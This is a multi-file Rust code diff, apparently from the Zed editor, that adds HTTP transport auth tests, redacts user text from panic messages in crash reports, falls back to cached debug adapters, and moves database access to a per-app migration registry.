+ Some(provider.clone()),
+ );
+
+ let err = transport
+ .send(r#"{"jsonrpc":"2.0","id":1,"method":"ping"}"#.to_string())
+ .await
+ .unwrap_err();
+
+ let transport_err = err
+ .downcast_ref::<TransportError>()
+ .expect("error should be TransportError");
+ match transport_err {
+ TransportError::AuthRequired { www_authenticate } => {
+ assert_eq!(
+ www_authenticate
+ .resource_metadata
+ .as_ref()
+ .map(|u| u.as_str()),
+ Some("https://mcp.example.com/.well-known/oauth-protected-resource"),
+ );
+ assert_eq!(
+ www_authenticate.scope,
+ Some(vec!["read".to_string(), "write".to_string()]),
+ );
+ }
+ }
+ assert_eq!(provider.refresh_count(), 1);
+ }
+
+ #[gpui::test]
+ async fn test_401_returns_auth_required_without_provider(cx: &mut TestAppContext) {
+ let client = make_fake_http_client(|_req| {
+ Box::pin(async {
+ Ok(Response::builder()
+ .status(401)
+ .header("WWW-Authenticate", "Bearer")
+ .body(AsyncBody::from(b"Unauthorized".to_vec()))
+ .unwrap())
+ })
+ });
+
+ // No token provider at all.
+ let transport = HttpTransport::new(
+ client,
+ "http://mcp.example.com/mcp".to_string(),
+ HashMap::default(),
+ cx.background_executor.clone(),
+ );
+
+ let err = transport
+ .send(r#"{"jsonrpc":"2.0","id":1,"method":"ping"}"#.to_string())
+ .await
+ .unwrap_err();
+
+ let transport_err = err
+ .downcast_ref::<TransportError>()
+ .expect("error should be TransportError");
+ match transport_err {
+ TransportError::AuthRequired { www_authenticate } => {
+ assert!(www_authenticate.resource_metadata.is_none());
+ assert!(www_authenticate.scope.is_none());
+ }
+ }
+ }
+
+ #[gpui::test]
+ async fn test_401_after_successful_refresh_still_returns_auth_required(
+ cx: &mut TestAppContext,
+ ) {
+ // Both requests return 401 — the server rejects the refreshed token too.
+ let client = make_fake_http_client(|_req| {
+ Box::pin(async {
+ Ok(Response::builder()
+ .status(401)
+ .header("WWW-Authenticate", "Bearer")
+ .body(AsyncBody::from(b"Unauthorized".to_vec()))
+ .unwrap())
+ })
+ });
+
+ let provider = FakeTokenProvider::new(Some("token"), true);
+ let transport = HttpTransport::new_with_token_provider(
+ client,
+ "http://mcp.example.com/mcp".to_string(),
+ HashMap::default(),
+ cx.background_executor.clone(),
+ Some(provider.clone()),
+ );
+
+ let err = transport
+ .send(r#"{"jsonrpc":"2.0","id":1,"method":"ping"}"#.to_string())
+ .await
+ .unwrap_err();
+
+ err.downcast_ref::<TransportError>()
+ .expect("error should be TransportError");
+ // Refresh was attempted exactly once.
+ assert_eq!(provider.refresh_count(), 1);
+ }
+}
@@ -949,7 +949,7 @@ impl Copilot {
&& let Some(registered_buffer) = server.registered_buffers.get_mut(&buffer.entity_id())
{
match event {
- language::BufferEvent::Edited => {
+ language::BufferEvent::Edited { .. } => {
drop(registered_buffer.report_changes(&buffer, cx));
}
language::BufferEvent::Saved => {
@@ -1779,6 +1779,7 @@ mod tests {
fn disk_state(&self) -> language::DiskState {
language::DiskState::Present {
mtime: ::fs::MTime::from_seconds_and_nanos(100, 42),
+ size: 0,
}
}
@@ -129,7 +129,9 @@ impl EditPredictionDelegate for CopilotEditPredictionDelegate {
}
}
- fn discard(&mut self, _reason: EditPredictionDiscardReason, _: &mut Context<Self>) {}
+ fn discard(&mut self, _reason: EditPredictionDiscardReason, _: &mut Context<Self>) {
+ self.completion.take();
+ }
fn suggest(
&mut self,
@@ -410,8 +412,14 @@ mod tests {
assert_eq!(editor.display_text(cx), "one.c \ntwo\nthree\n");
assert_eq!(editor.text(cx), "one.c \ntwo\nthree\n");
- // When undoing the previously active suggestion is shown again.
+ // When undoing the previously active suggestion isn't shown again.
editor.undo(&Default::default(), window, cx);
+ assert!(!editor.has_active_edit_prediction());
+ assert_eq!(editor.display_text(cx), "one.c\ntwo\nthree\n");
+ assert_eq!(editor.text(cx), "one.c\ntwo\nthree\n");
+ });
+ executor.advance_clock(COPILOT_DEBOUNCE_TIMEOUT);
+ cx.editor(|editor, _, cx| {
assert!(editor.has_active_edit_prediction());
assert_eq!(editor.display_text(cx), "one.copilot2\ntwo\nthree\n");
assert_eq!(editor.text(cx), "one.c\ntwo\nthree\n");
@@ -387,10 +387,11 @@ impl CopilotCodeVerification {
.full_width()
.style(ButtonStyle::Outlined)
.size(ButtonSize::Medium)
- .icon(IconName::Download)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
+ .start_icon(
+ Icon::new(IconName::Download)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(move |_, window, cx| {
reinstall_and_sign_in(copilot.clone(), window, cx)
}),
@@ -570,10 +571,11 @@ impl ConfigurationView {
}
})
.style(ButtonStyle::Outlined)
- .icon(IconName::Github)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
+ .start_icon(
+ Icon::new(IconName::Github)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.when(edit_prediction, |this| this.tab_index(0isize))
.on_click(|_, window, cx| {
if let Some(app_state) = AppState::global(cx).upgrade()
@@ -600,10 +602,11 @@ impl ConfigurationView {
}
})
.style(ButtonStyle::Outlined)
- .icon(IconName::Download)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
+ .start_icon(
+ Icon::new(IconName::Download)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(|_, window, cx| {
if let Some(app_state) = AppState::global(cx).upgrade()
&& let Some(copilot) = GlobalCopilotAuth::try_get_or_init(app_state, cx)
@@ -350,8 +350,34 @@ impl minidumper::ServerHandler for CrashServer {
}
}
+/// Rust's string-slicing panics embed the user's string content in the message,
+/// e.g. "byte index 4 is out of bounds of `a`". Strip that suffix so we
+/// don't upload arbitrary user text in crash reports.
+fn strip_user_string_from_panic(message: &str) -> String {
+ const STRING_PANIC_PREFIXES: &[&str] = &[
+ // Older rustc (pre-1.95):
+ "byte index ",
+ "begin <= end (",
+ // Newer rustc (1.95+):
+ // https://github.com/rust-lang/rust/pull/145024
+ "start byte index ",
+ "end byte index ",
+ "begin > end (",
+ ];
+
+ if (message.ends_with('`') || message.ends_with("`[...]"))
+ && STRING_PANIC_PREFIXES
+ .iter()
+ .any(|prefix| message.starts_with(prefix))
+ && let Some(open) = message.find('`')
+ {
+ return format!("{} `<redacted>`", &message[..open]);
+ }
+ message.to_owned()
+}
+
pub fn panic_hook(info: &PanicHookInfo) {
- let message = info.payload_as_str().unwrap_or("Box<Any>").to_owned();
+ let message = strip_user_string_from_panic(info.payload_as_str().unwrap_or("Box<Any>"));
let span = info
.location()
@@ -8,6 +8,7 @@ use dap::{
},
};
use fs::Fs;
+use futures::StreamExt;
use gpui::{AsyncApp, SharedString};
use language::LanguageName;
use log::warn;
@@ -71,27 +72,59 @@ impl GoDebugAdapter {
return Ok(path);
}
- let asset = Self::fetch_latest_adapter_version(delegate).await?;
- let ty = if consts::OS == "windows" {
- DownloadedFileType::Zip
- } else {
- DownloadedFileType::GzipTar
- };
- download_adapter_from_github(
- "delve-shim-dap".into(),
- asset.clone(),
- ty,
- delegate.as_ref(),
- )
- .await?;
+ let adapter_dir = paths::debug_adapters_dir().join("delve-shim-dap");
+
+ match Self::fetch_latest_adapter_version(delegate).await {
+ Ok(asset) => {
+ let ty = if consts::OS == "windows" {
+ DownloadedFileType::Zip
+ } else {
+ DownloadedFileType::GzipTar
+ };
+ download_adapter_from_github(
+ "delve-shim-dap".into(),
+ asset.clone(),
+ ty,
+ delegate.as_ref(),
+ )
+ .await?;
+
+ let path = adapter_dir
+ .join(format!("delve-shim-dap_{}", asset.tag_name))
+ .join(format!("delve-shim-dap{}", consts::EXE_SUFFIX));
+ self.shim_path.set(path.clone()).ok();
- let path = paths::debug_adapters_dir()
- .join("delve-shim-dap")
- .join(format!("delve-shim-dap_{}", asset.tag_name))
- .join(format!("delve-shim-dap{}", std::env::consts::EXE_SUFFIX));
- self.shim_path.set(path.clone()).ok();
+ Ok(path)
+ }
+ Err(error) => {
+ let binary_name = format!("delve-shim-dap{}", consts::EXE_SUFFIX);
+ let mut cached = None;
+ if let Ok(mut entries) = delegate.fs().read_dir(&adapter_dir).await {
+ while let Some(entry) = entries.next().await {
+ if let Ok(version_dir) = entry {
+ let candidate = version_dir.join(&binary_name);
+ if delegate
+ .fs()
+ .metadata(&candidate)
+ .await
+ .is_ok_and(|m| m.is_some())
+ {
+ cached = Some(candidate);
+ break;
+ }
+ }
+ }
+ }
- Ok(path)
+ if let Some(path) = cached {
+ warn!("Failed to fetch latest delve-shim-dap, using cached version: {error:#}");
+ self.shim_path.set(path.clone()).ok();
+ Ok(path)
+ } else {
+ Err(error)
+ }
+ }
+ }
}
}
@@ -224,16 +224,27 @@ impl PythonDebugAdapter {
) -> Result<Arc<Path>, String> {
self.debugpy_whl_base_path
.get_or_init(|| async move {
- self.maybe_fetch_new_wheel(toolchain, delegate)
- .await
- .map_err(|e| format!("{e}"))?;
- Ok(Arc::from(
- debug_adapters_dir()
- .join(Self::ADAPTER_NAME)
- .join("debugpy")
- .join("adapter")
- .as_ref(),
- ))
+ let adapter_path = debug_adapters_dir()
+ .join(Self::ADAPTER_NAME)
+ .join("debugpy")
+ .join("adapter");
+
+ if let Err(error) = self.maybe_fetch_new_wheel(toolchain, delegate).await {
+ if delegate
+ .fs()
+ .metadata(&adapter_path)
+ .await
+ .is_ok_and(|m| m.is_some())
+ {
+ log::warn!(
+ "Failed to fetch latest debugpy, using cached version: {error:#}"
+ );
+ } else {
+ return Err(format!("{error}"));
+ }
+ }
+
+ Ok(Arc::from(adapter_path.as_ref()))
})
.await
.clone()
@@ -19,6 +19,7 @@ test-support = []
anyhow.workspace = true
gpui.workspace = true
indoc.workspace = true
+inventory.workspace = true
log.workspace = true
paths.workspace = true
release_channel.workspace = true
@@ -26,6 +27,7 @@ smol.workspace = true
sqlez.workspace = true
sqlez_macros.workspace = true
util.workspace = true
+uuid.workspace = true
zed_env_vars.workspace = true
[dev-dependencies]
@@ -4,12 +4,15 @@ pub mod query;
// Re-export
pub use anyhow;
use anyhow::Context as _;
-use gpui::{App, AppContext};
+pub use gpui;
+use gpui::{App, AppContext, Global};
pub use indoc::indoc;
+pub use inventory;
pub use paths::database_dir;
pub use smol;
pub use sqlez;
pub use sqlez_macros;
+pub use uuid;
pub use release_channel::RELEASE_CHANNEL;
use sqlez::domain::Migrator;
@@ -22,6 +25,103 @@ use std::sync::{LazyLock, atomic::Ordering};
use util::{ResultExt, maybe};
use zed_env_vars::ZED_STATELESS;
+/// A migration registered via `static_connection!` and collected at link time.
+pub struct DomainMigration {
+ pub name: &'static str,
+ pub migrations: &'static [&'static str],
+ pub dependencies: &'static [&'static str],
+ pub should_allow_migration_change: fn(usize, &str, &str) -> bool,
+}
+
+inventory::collect!(DomainMigration);
+
+/// The shared database connection backing all domain-specific DB wrappers.
+/// Set as a GPUI global per-App. Falls back to a shared LazyLock if not set.
+pub struct AppDatabase(pub ThreadSafeConnection);
+
+impl Global for AppDatabase {}
+
+/// Migrator that runs all inventory-registered domain migrations.
+pub struct AppMigrator;
+
+impl Migrator for AppMigrator {
+ fn migrate(connection: &sqlez::connection::Connection) -> anyhow::Result<()> {
+ let registrations: Vec<&DomainMigration> = inventory::iter::<DomainMigration>().collect();
+ let sorted = topological_sort(®istrations);
+ for reg in &sorted {
+ let mut should_allow = reg.should_allow_migration_change;
+ connection.migrate(reg.name, reg.migrations, &mut should_allow)?;
+ }
+ Ok(())
+ }
+}
+
+impl AppDatabase {
+ /// Opens the production database and runs all inventory-registered
+ /// migrations in dependency order.
+ pub fn new() -> Self {
+ let db_dir = database_dir();
+ let scope = RELEASE_CHANNEL.dev_name();
+ let connection = smol::block_on(open_db::<AppMigrator>(db_dir, scope));
+ Self(connection)
+ }
+
+ /// Creates a new in-memory database with a unique name and runs all
+ /// inventory-registered migrations in dependency order.
+ #[cfg(any(test, feature = "test-support"))]
+ pub fn test_new() -> Self {
+ let name = format!("test-db-{}", uuid::Uuid::new_v4());
+ let connection = smol::block_on(open_test_db::<AppMigrator>(&name));
+ Self(connection)
+ }
+
+ /// Returns the per-App connection if set, otherwise falls back to
+ /// the shared LazyLock.
+ pub fn global(cx: &App) -> &ThreadSafeConnection {
+ #[allow(unreachable_code)]
+ if let Some(db) = cx.try_global::<Self>() {
+ return &db.0;
+ } else {
+ #[cfg(any(feature = "test-support", test))]
+ return &TEST_APP_DATABASE.0;
+
+ panic!("database not initialized")
+ }
+ }
+}
+
+fn topological_sort<'a>(registrations: &[&'a DomainMigration]) -> Vec<&'a DomainMigration> {
+ let mut sorted: Vec<&DomainMigration> = Vec::new();
+ let mut visited: std::collections::HashSet<&str> = std::collections::HashSet::new();
+
+ fn visit<'a>(
+ name: &str,
+ registrations: &[&'a DomainMigration],
+ sorted: &mut Vec<&'a DomainMigration>,
+ visited: &mut std::collections::HashSet<&'a str>,
+ ) {
+ if visited.contains(name) {
+ return;
+ }
+ if let Some(reg) = registrations.iter().find(|r| r.name == name) {
+ for dep in reg.dependencies {
+ visit(dep, registrations, sorted, visited);
+ }
+ visited.insert(reg.name);
+ sorted.push(reg);
+ }
+ }
+
+ for reg in registrations {
+ visit(reg.name, registrations, &mut sorted, &mut visited);
+ }
+ sorted
+}
+
+/// Shared fallback `AppDatabase` used when no per-App global is set.
+#[cfg(any(test, feature = "test-support"))]
+static TEST_APP_DATABASE: LazyLock<AppDatabase> = LazyLock::new(AppDatabase::test_new);
+
const CONNECTION_INITIALIZE_QUERY: &str = sql!(
PRAGMA foreign_keys=TRUE;
);
@@ -110,12 +210,11 @@ pub async fn open_test_db<M: Migrator>(db_name: &str) -> ThreadSafeConnection {
/// Implements a basic DB wrapper for a given domain
///
/// Arguments:
-/// - static variable name for connection
/// - type of connection wrapper
/// - dependencies, whose migrations should be run prior to this domain's migrations
#[macro_export]
macro_rules! static_connection {
- ($id:ident, $t:ident, [ $($d:ty),* ] $(, $global:ident)?) => {
+ ($t:ident, [ $($d:ty),* ]) => {
impl ::std::ops::Deref for $t {
type Target = $crate::sqlez::thread_safe_connection::ThreadSafeConnection;
@@ -124,30 +223,33 @@ macro_rules! static_connection {
}
}
+ impl ::std::clone::Clone for $t {
+ fn clone(&self) -> Self {
+ $t(self.0.clone())
+ }
+ }
+
impl $t {
+ /// Returns an instance backed by the per-App database if set,
+ /// or the shared fallback connection otherwise.
+ pub fn global(cx: &$crate::gpui::App) -> Self {
+ $t($crate::AppDatabase::global(cx).clone())
+ }
+
#[cfg(any(test, feature = "test-support"))]
pub async fn open_test_db(name: &'static str) -> Self {
$t($crate::open_test_db::<$t>(name).await)
}
}
- #[cfg(any(test, feature = "test-support"))]
- pub static $id: std::sync::LazyLock<$t> = std::sync::LazyLock::new(|| {
- #[allow(unused_parens)]
- $t($crate::smol::block_on($crate::open_test_db::<($($d,)* $t)>(stringify!($id))))
- });
-
- #[cfg(not(any(test, feature = "test-support")))]
- pub static $id: std::sync::LazyLock<$t> = std::sync::LazyLock::new(|| {
- let db_dir = $crate::database_dir();
- let scope = if false $(|| stringify!($global) == "global")? {
- "global"
- } else {
- $crate::RELEASE_CHANNEL.dev_name()
- };
- #[allow(unused_parens)]
- $t($crate::smol::block_on($crate::open_db::<($($d,)* $t)>(db_dir, scope)))
- });
+ $crate::inventory::submit! {
+ $crate::DomainMigration {
+ name: <$t as $crate::sqlez::domain::Domain>::NAME,
+ migrations: <$t as $crate::sqlez::domain::Domain>::MIGRATIONS,
+ dependencies: &[$(<$d as $crate::sqlez::domain::Domain>::NAME),*],
+ should_allow_migration_change: <$t as $crate::sqlez::domain::Domain>::should_allow_migration_change,
+ }
+ }
}
}
@@ -11,6 +11,12 @@ use crate::{
pub struct KeyValueStore(crate::sqlez::thread_safe_connection::ThreadSafeConnection);
+impl KeyValueStore {
+ pub fn from_app_db(db: &crate::AppDatabase) -> Self {
+ Self(db.0.clone())
+ }
+}
+
impl Domain for KeyValueStore {
const NAME: &str = stringify!(KeyValueStore);
@@ -32,26 +38,25 @@ impl Domain for KeyValueStore {
];
}
-crate::static_connection!(KEY_VALUE_STORE, KeyValueStore, []);
+crate::static_connection!(KeyValueStore, []);
pub trait Dismissable {
const KEY: &'static str;
- fn dismissed() -> bool {
- KEY_VALUE_STORE
+ fn dismissed(cx: &App) -> bool {
+ KeyValueStore::global(cx)
.read_kvp(Self::KEY)
.log_err()
.is_some_and(|s| s.is_some())
}
fn set_dismissed(is_dismissed: bool, cx: &mut App) {
+ let db = KeyValueStore::global(cx);
write_and_log(cx, move || async move {
if is_dismissed {
- KEY_VALUE_STORE
- .write_kvp(Self::KEY.into(), "1".into())
- .await
+ db.write_kvp(Self::KEY.into(), "1".into()).await
} else {
- KEY_VALUE_STORE.delete_kvp(Self::KEY.into()).await
+ db.delete_kvp(Self::KEY.into()).await
}
})
}
@@ -228,9 +233,26 @@ impl Domain for GlobalKeyValueStore {
)];
}
-crate::static_connection!(GLOBAL_KEY_VALUE_STORE, GlobalKeyValueStore, [], global);
+impl std::ops::Deref for GlobalKeyValueStore {
+ type Target = ThreadSafeConnection;
+ fn deref(&self) -> &Self::Target {
+ &self.0
+ }
+}
+
+static GLOBAL_KEY_VALUE_STORE: std::sync::LazyLock<GlobalKeyValueStore> =
+ std::sync::LazyLock::new(|| {
+ let db_dir = crate::database_dir();
+ GlobalKeyValueStore(smol::block_on(crate::open_db::<GlobalKeyValueStore>(
+ db_dir, "global",
+ )))
+ });
impl GlobalKeyValueStore {
+ pub fn global() -> &'static Self {
+ &GLOBAL_KEY_VALUE_STORE
+ }
+
query! {
pub fn read_kvp(key: &str) -> Result<Option<String>> {
SELECT value FROM kv_store WHERE key = (?)
@@ -1461,7 +1461,12 @@ async fn register_session_inner(
.detach();
})
.ok();
- let serialized_layout = persistence::get_serialized_layout(adapter_name).await;
+ let serialized_layout = this
+ .update(cx, |_, cx| {
+ persistence::get_serialized_layout(&adapter_name, &db::kvp::KeyValueStore::global(cx))
+ })
+ .ok()
+ .flatten();
let debug_session = this.update_in(cx, |this, window, cx| {
let parent_session = this
.sessions_with_children
@@ -1821,20 +1826,22 @@ impl Render for DebugPanel {
.gap_2()
.child(
Button::new("spawn-new-session-empty-state", "New Session")
- .icon(IconName::Plus)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::Plus)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(|_, window, cx| {
window.dispatch_action(crate::Start.boxed_clone(), cx);
}),
)
.child(
Button::new("edit-debug-settings", "Edit debug.json")
- .icon(IconName::Code)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::Code)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(|_, window, cx| {
window.dispatch_action(
zed_actions::OpenProjectDebugTasks.boxed_clone(),
@@ -1844,10 +1851,11 @@ impl Render for DebugPanel {
)
.child(
Button::new("open-debugger-docs", "Debugger Docs")
- .icon(IconName::Book)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::Book)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(|_, _, cx| cx.open_url("https://zed.dev/docs/debugger")),
)
.child(
@@ -1855,10 +1863,11 @@ impl Render for DebugPanel {
"spawn-new-session-install-extensions",
"Debugger Extensions",
)
- .icon(IconName::Blocks)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::Blocks)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(|_, window, cx| {
window.dispatch_action(
zed_actions::Extensions {
@@ -1,7 +1,7 @@
use anyhow::Context as _;
use collections::HashMap;
use dap::{Capabilities, adapters::DebugAdapterName};
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use gpui::{Axis, Context, Entity, EntityId, Focusable, Subscription, WeakEntity, Window};
use project::Project;
use serde::{Deserialize, Serialize};
@@ -125,15 +125,15 @@ const DEBUGGER_PANEL_PREFIX: &str = "debugger_panel_";
pub(crate) async fn serialize_pane_layout(
adapter_name: DebugAdapterName,
pane_group: SerializedLayout,
+ kvp: KeyValueStore,
) -> anyhow::Result<()> {
let serialized_pane_group = serde_json::to_string(&pane_group)
.context("Serializing pane group with serde_json as a string")?;
- KEY_VALUE_STORE
- .write_kvp(
- format!("{DEBUGGER_PANEL_PREFIX}-{adapter_name}"),
- serialized_pane_group,
- )
- .await
+ kvp.write_kvp(
+ format!("{DEBUGGER_PANEL_PREFIX}-{adapter_name}"),
+ serialized_pane_group,
+ )
+ .await
}
pub(crate) fn build_serialized_layout(
@@ -187,13 +187,13 @@ fn serialize_pane(pane: &Entity<Pane>, cx: &App) -> SerializedPane {
}
}
-pub(crate) async fn get_serialized_layout(
+pub(crate) fn get_serialized_layout(
adapter_name: impl AsRef<str>,
+ kvp: &KeyValueStore,
) -> Option<SerializedLayout> {
let key = format!("{DEBUGGER_PANEL_PREFIX}-{}", adapter_name.as_ref());
- KEY_VALUE_STORE
- .read_kvp(&key)
+ kvp.read_kvp(&key)
.log_err()
.flatten()
.and_then(|value| serde_json::from_str::<SerializedLayout>(&value).ok())
@@ -1313,6 +1313,7 @@ impl RunningState {
show_summary: false,
show_command: false,
show_rerun: false,
+ save: task::SaveStrategy::default(),
};
let workspace = self.workspace.clone();
@@ -1501,9 +1502,14 @@ impl RunningState {
return;
};
- persistence::serialize_pane_layout(adapter_name, pane_layout)
- .await
- .log_err();
+ let kvp = this
+ .read_with(cx, |_, cx| db::kvp::KeyValueStore::global(cx))
+ .ok();
+ if let Some(kvp) = kvp {
+ persistence::serialize_pane_layout(adapter_name, pane_layout, kvp)
+ .await
+ .log_err();
+ }
this.update(cx, |this, _| {
this._schedule_serialize.take();
@@ -6,7 +6,7 @@ use std::{
};
use dap::{Capabilities, ExceptionBreakpointsFilter, adapters::DebugAdapterName};
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use editor::Editor;
use gpui::{
Action, AppContext, ClickEvent, Entity, FocusHandle, Focusable, MouseButton, ScrollStrategy,
@@ -520,8 +520,9 @@ impl BreakpointList {
});
let value = serde_json::to_string(&settings);
+ let kvp = KeyValueStore::global(cx);
cx.background_executor()
- .spawn(async move { KEY_VALUE_STORE.write_kvp(key, value?).await })
+ .spawn(async move { kvp.write_kvp(key, value?).await })
} else {
Task::ready(Result::Ok(()))
}
@@ -532,7 +533,7 @@ impl BreakpointList {
adapter_name: DebugAdapterName,
cx: &mut Context<Self>,
) -> anyhow::Result<()> {
- let Some(val) = KEY_VALUE_STORE.read_kvp(&Self::kvp_key(&adapter_name))? else {
+ let Some(val) = KeyValueStore::global(cx).read_kvp(&Self::kvp_key(&adapter_name))? else {
return Ok(());
};
let value: PersistedAdapterOptions = serde_json::from_str(&val)?;
@@ -303,7 +303,8 @@ impl Console {
}
fn previous_query(&mut self, _: &SelectPrevious, window: &mut Window, cx: &mut Context<Self>) {
- let prev = self.history.previous(&mut self.cursor);
+ let current_query = self.query_bar.read(cx).text(cx);
+ let prev = self.history.previous(&mut self.cursor, ¤t_query);
if let Some(prev) = prev {
self.query_bar.update(cx, |editor, cx| {
editor.set_text(prev, window, cx);
@@ -5,7 +5,7 @@ use std::time::Duration;
use anyhow::{Context as _, Result, anyhow};
use dap::StackFrameId;
use dap::adapters::DebugAdapterName;
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use gpui::{
Action, AnyElement, Entity, EventEmitter, FocusHandle, Focusable, FontWeight, ListState,
Subscription, Task, WeakEntity, list,
@@ -122,7 +122,7 @@ impl StackFrameList {
.flatten()
.and_then(|database_id| {
let key = stack_frame_filter_key(&session.read(cx).adapter(), database_id);
- KEY_VALUE_STORE
+ KeyValueStore::global(cx)
.read_kvp(&key)
.ok()
.flatten()
@@ -852,8 +852,10 @@ impl StackFrameList {
.flatten()
{
let key = stack_frame_filter_key(&self.session.read(cx).adapter(), database_id);
- let save_task = KEY_VALUE_STORE.write_kvp(key, self.list_filter.into());
- cx.background_spawn(save_task).detach();
+ let kvp = KeyValueStore::global(cx);
+ let filter: String = self.list_filter.into();
+ cx.background_spawn(async move { kvp.write_kvp(key, filter).await })
+ .detach();
}
if let Some(ThreadStatus::Stopped) = thread_status {
@@ -132,7 +132,13 @@ pub fn start_debug_session_with<T: Fn(&Arc<DebugAdapterClient>) + 'static>(
.workspace()
.read(cx)
.panel::<DebugPanel>(cx)
- .and_then(|panel| panel.read(cx).active_session())
+ .and_then(|panel| {
+ panel
+ .read(cx)
+ .sessions_with_children
+ .keys()
+ .max_by_key(|session| session.read(cx).session_id(cx))
+ })
.map(|session| session.read(cx).running_state().read(cx).session())
.cloned()
.context("Failed to get active session")
@@ -27,7 +27,7 @@ use std::{
path::Path,
sync::{
Arc,
- atomic::{AtomicBool, Ordering},
+ atomic::{AtomicBool, AtomicUsize, Ordering},
},
};
use terminal_view::terminal_panel::TerminalPanel;
@@ -2481,3 +2481,75 @@ async fn test_adapter_shutdown_with_child_sessions_on_app_quit(
"Child session should have received disconnect request"
);
}
+
+#[gpui::test]
+async fn test_restart_request_is_not_sent_more_than_once_until_response(
+ executor: BackgroundExecutor,
+ cx: &mut TestAppContext,
+) {
+ init_test(cx);
+
+ let fs = FakeFs::new(executor.clone());
+
+ fs.insert_tree(
+ path!("/project"),
+ json!({
+ "main.rs": "First line\nSecond line\nThird line\nFourth line",
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs, [path!("/project").as_ref()], cx).await;
+ let workspace = init_test_workspace(&project, cx).await;
+ let cx = &mut VisualTestContext::from_window(*workspace, cx);
+
+ let session = start_debug_session(&workspace, cx, move |client| {
+ client.on_request::<dap::requests::Initialize, _>(move |_, _| {
+ Ok(dap::Capabilities {
+ supports_restart_request: Some(true),
+ ..Default::default()
+ })
+ });
+ })
+ .unwrap();
+
+ let client = session.update(cx, |session, _| session.adapter_client().unwrap());
+
+ let restart_count = Arc::new(AtomicUsize::new(0));
+
+ client.on_request::<dap::requests::Restart, _>({
+ let restart_count = restart_count.clone();
+ move |_, _| {
+ restart_count.fetch_add(1, Ordering::SeqCst);
+ Ok(())
+ }
+ });
+
+ // This works because the restart request sender is on the foreground thread
+ // so it will start running after the gpui update stack is cleared
+ session.update(cx, |session, cx| {
+ session.restart(None, cx);
+ session.restart(None, cx);
+ session.restart(None, cx);
+ });
+
+ cx.run_until_parked();
+
+ assert_eq!(
+ restart_count.load(Ordering::SeqCst),
+ 1,
+ "Only one restart request should be sent while a restart is in-flight"
+ );
+
+ session.update(cx, |session, cx| {
+ session.restart(None, cx);
+ });
+
+ cx.run_until_parked();
+
+ assert_eq!(
+ restart_count.load(Ordering::SeqCst),
+ 2,
+ "A second restart should be allowed after the first one completes"
+ );
+}
@@ -9,7 +9,7 @@ use dap::{
StackFrame,
requests::{Scopes, StackTrace, Threads},
};
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use editor::{Editor, ToPoint as _};
use gpui::{BackgroundExecutor, TestAppContext, VisualTestContext};
use project::{FakeFs, Project};
@@ -1217,7 +1217,10 @@ async fn test_stack_frame_filter_persistence(
.expect("workspace id has to be some for this test to work properly");
let key = stack_frame_filter_key(&adapter_name, workspace_id);
- let stored_value = KEY_VALUE_STORE.read_kvp(&key).unwrap();
+ let stored_value = cx
+ .update(|_, cx| KeyValueStore::global(cx))
+ .read_kvp(&key)
+ .unwrap();
assert_eq!(
stored_value,
Some(StackFrameFilter::OnlyUserFrames.into()),
@@ -28,7 +28,7 @@ pub struct DiagnosticIndicator {
impl Render for DiagnosticIndicator {
fn render(&mut self, _: &mut Window, cx: &mut Context<Self>) -> impl IntoElement {
- let indicator = h_flex().gap_2();
+ let indicator = h_flex().gap_2().min_w_0().overflow_x_hidden();
if !ProjectSettings::get_global(cx).diagnostics.button {
return indicator.hidden();
}
@@ -67,6 +67,7 @@ impl Render for DiagnosticIndicator {
Some(
Button::new("diagnostic_message", SharedString::new(message))
.label_size(LabelSize::Small)
+ .truncate(true)
.tooltip(|_window, cx| {
Tooltip::for_action(
"Next Diagnostic",
@@ -17,7 +17,7 @@ cli-support = []
[dependencies]
ai_onboarding.workspace = true
anyhow.workspace = true
-arrayvec.workspace = true
+heapless.workspace = true
brotli.workspace = true
buffer_diff.workspace = true
client.workspace = true
@@ -1,5 +1,4 @@
use anyhow::Result;
-use arrayvec::ArrayVec;
use client::{Client, EditPredictionUsage, UserStore};
use cloud_api_types::{OrganizationId, SubmitEditPredictionFeedbackBody};
use cloud_llm_client::predict_edits_v3::{
@@ -12,7 +11,7 @@ use cloud_llm_client::{
};
use collections::{HashMap, HashSet};
use copilot::{Copilot, Reinstall, SignIn, SignOut};
-use db::kvp::{Dismissable, KEY_VALUE_STORE};
+use db::kvp::{Dismissable, KeyValueStore};
use edit_prediction_context::{RelatedExcerptStore, RelatedExcerptStoreEvent, RelatedFile};
use feature_flags::{FeatureFlag, FeatureFlagAppExt as _};
use futures::{
@@ -23,14 +22,15 @@ use futures::{
use gpui::BackgroundExecutor;
use gpui::http_client::Url;
use gpui::{
- App, AsyncApp, Entity, EntityId, Global, SharedString, Subscription, Task, WeakEntity, actions,
+ App, AsyncApp, Entity, EntityId, Global, SharedString, Task, WeakEntity, actions,
http_client::{self, AsyncBody, Method},
prelude::*,
};
+use heapless::Vec as ArrayVec;
use language::language_settings::all_language_settings;
use language::{Anchor, Buffer, File, Point, TextBufferSnapshot, ToOffset, ToPoint};
